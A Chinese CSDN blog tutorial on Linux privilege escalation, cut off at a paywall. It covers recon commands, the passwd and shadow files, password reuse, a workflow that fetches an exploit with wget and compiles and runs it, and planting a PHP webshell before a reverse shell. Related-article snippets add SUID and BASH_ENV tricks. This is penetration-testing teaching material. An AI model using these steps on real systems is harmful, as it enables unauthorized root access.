提权学习之旅——Linux操作系统提权

最新推荐文章于 2024-08-11 17:18:24 发布
最新推荐文章于 2024-08-11 17:18:24 发布
阅读量2.9k 收藏 22
点赞数 3
分类专栏: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/107737419
版权
本文主要介绍了Linux操作系统的提权基础知识和实战技巧,包括Linux提权方法、密码权限、反弹shell、脏牛提权,以及SUID提权、历史记录提权、计划任务提权和配置错误引发的提权。通过Linux-exploit-suggester和Searchsploit等工具,辅助进行提权操作。
摘要由CSDN通过智能技术生成

首发于先知社区

https://xz.aliyun.com/t/8139

前言:

上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权

Linux提权基础

0x00:Linux提权方法

大致归纳总结如下:
在这里插入图片描述
不过最核心也是最常见的提取方法还是内核提权,其他大多与程序员的配置有关,出现的几率不是很高。

0x01:Linux提权基础知识
uname -a
查看内核版本
id
显示用户的ID,以及所属群组的ID
pwd
显示当前路径
dpkg -l
rpm -qa
查看已经安装的程序
cat /etc/issue
cat /etc/*-release
查看发行版

密码权限

大部分Linux系统的密码都和/etc/passwd/etc/shadow这两个配置文件有关,passwd里面储存的是用户shadow里面存储的是密码的hash值。出于安全考虑passwd是全用户可读,root可写的,而shadow是仅root可读写的。

/etc/passwd
在这里插入图片描述
passwd由冒号分割,第一列是用户名,第二列是密码,x代表密码hash被放在shadow里面.

/etc/shadow
在这里插入图片描述
shadow里面的就是密码的hash,但只有root权限才可以查看。

密码复用

另外需要注意的是很多管理员会重复使用密码,所以有可能数据库或者web后台的密码就是root密码。

提权常见的流程

  1. wget http://exp/exp.c
下载exp文件
  1. gcc -o exp exp.c
利用gcc进行编译操作,编译成二进制文件
  1. chmod +x exp
将exp更改为可执行权限
  1. ./exp
运行exp进行提权
0x02:Linux反弹shell

Linux一般拿到shell,权限基本都很低,而且在菜刀或其他工具中执行命令没有交互过程(在菜刀等工具中,只是输入返回内容,如在菜刀中执行ssh等命令就不可行),所以需要通过反弹shell拥有一个交互式的shell

准备环境

ubuntu + apache
kail 192.168.186.134
ubuntu 192.168.186.152

上传进去一个php一句话木马,菜刀连接
在这里插入图片描述
查看当前权限
在这里插入图片描述
下面就使用反弹shell的方法获取到交互式shell

第一种方法:

利用最经典也是最常用的方法进行反弹shell,另外反弹shell时设置的端口最好是常用端口,不常用的端口可能会被防火墙给拦截掉。

先进行本地进行监听:
最低0.47元/天 解锁文章
lemonl1
关注
专栏目录
Linux提权
liver100day的博客
11-16 4500
文章目录Linux提权1.1 sudo提权1.2 suid提权1.3 计划任务cron1.4 内核漏洞提权2.4.4 Linux_Exploit_Suggester(提权辅助工具)2.5 利用可写文件2.6、明文root密码提权2.7、密码复用2.8 查看用户最后编辑的文件2.9 查找敏感文件2.10 用grep查找有密码的文件后言 Linux提权 linux的权限划分没有windows的复杂,提权只需要从普通权限提升到root权限就可以了。 1.1 sudo提权 先进行尝试sudo su,查看是否为空密码
一个linux提权用的技巧
魔拉宝
09-16 446
 一个linux提权用的技巧,放出来攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本一个test:[xiaoyu@localdomain ~]$ echo $BASH_ENV[xiaoyu@localdomain ~]$ export BASH_ENV="/tmp/.bashrc"[x
Linux中的提权操作
weixin_52757485的博客
08-01 2236
具体工作过程:当用户执行sudo时,系统会主动寻找/etc/sudoers文件,判断该用户是否有执行sudo的权限,确认用户具有执行权限后,让用户输入用户自己的密码确认,若密码输入成功,则开始执行sudo后续的命令。临时提权的方法是用sudo的工作原理:将当前用户切换到超级用户下,以超级用户身份执行命令,执行完成后,直接退回到当前用户。[root@localhost ~]# vim /etc/sudoers (进入/etc/sudoers)(成功在普通用户下临时提权
Linux常见提权方式
最新发布
L_erAry的博客
08-11 1355
taskset命令用于设置进程(或 线程)的处理器亲和性(Processor Affinity),可以将进程(或 线程)绑定到特定的一个 或 多个CPU上去执行,而不允许将进程(或 线程)调度到其他的CPU上。在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。使用方法是,创建一个临时的文件,并在其中构建一个包来调用/bin/bash,然后通过apt-get安装该包。通过压缩一个存在的文件,并调用-T参数输出shell。
linux提权
温和的跳跃
01-25 307
我从docker逃匿->dirty cow->linux提权 。。。。。
Linux提权大全
yggcwhat
05-14 9499
Linux提权大全
Linux提权详解(一)
胖虎的博客
10-30 690
Linux提权方法和详解
提权学习之旅——Windows操作系统提权
Lemon's blog
08-11 1906
前言: 了解基础知识之后,这次就来仔细学一下Windows操作系统提权。 Windows提权基础 0x00:Windows提权的大致方向 要进行提权,首先要知道要在哪里能进行提权操作,只有清楚了提权的大致方向,才能事半功倍。 其中比较常见而且利用较多的有 内核提权 数据库提权 应用提权 中间人劫持等 0x01:Windows基础提权命令 查询系统信息 systeminfo 如果要查看特定的信息,可以使用 systeminfo | findstr /B /C:"OS名称" /C:"OS版本" 主机名
提权学习之旅——基础篇
Lemon's blog
07-30 891
前言: 无论是CTF赛题还是渗透测试,有很多时候拿到WebShell的权限并不高,没有办法继续深入,所以需要进行提权操作,方便下一步的进行!看了很多师傅们的博客,大多都是总结下常用思路,对于我这种菜鸡来说还是有点难懂,所以就通过这次总结将理论和实践联系到一起! 基础知识 0x00:什么是提权 提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。 简单的一句话就是权限提升。例如: Windows:User >> Syste
通往Linux之路(一)——一个Linux系统管理员成长笔记.pdf
09-07
《通往Linux之路(一)——一个Linux系统管理员成长笔记》是一部深入探讨Linux操作系统及其发展历程的文献,适合对系统开发和管理感兴趣的读者。该文档详细介绍了Linux的起源、特点以及其在网络环境中的应用,同时...
一招一式攻克Linux系列讲座(之二)——第二招Linux的基本配置.pdf
09-07
Linux 操作系统基本配置】 在“一招一式攻克Linux系列讲座(之二)——第二招Linux的基本配置”中,我们深入探讨了Linux...通过不断的实践和学习,我们可以更好地驾驭这门强大的操作系统,开启我们的Linux探索之旅
Linux 提权
weixin_60567444的博客
05-14 847
1.SUID权限只能设置二进制文件2.命令执行者要有二进制的执行权限3.命令执行者执行二进制文件时会获得该程序的属主身份4.SUID权限只在程序执行的过程中有效即如果root给一个程序赋予了suid权限,则普通用户在执行的过程中是root权限可以通过find / -perm -u=s -type f 2>/dev/null 命令来查找带有SUID权限的文件perm-指定的权限 -u=s代表SUID权限 type指定文件的类型 f-可以理解为可执行文件以cp为列子:在root下找到cp并且给它加SUID的权限
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值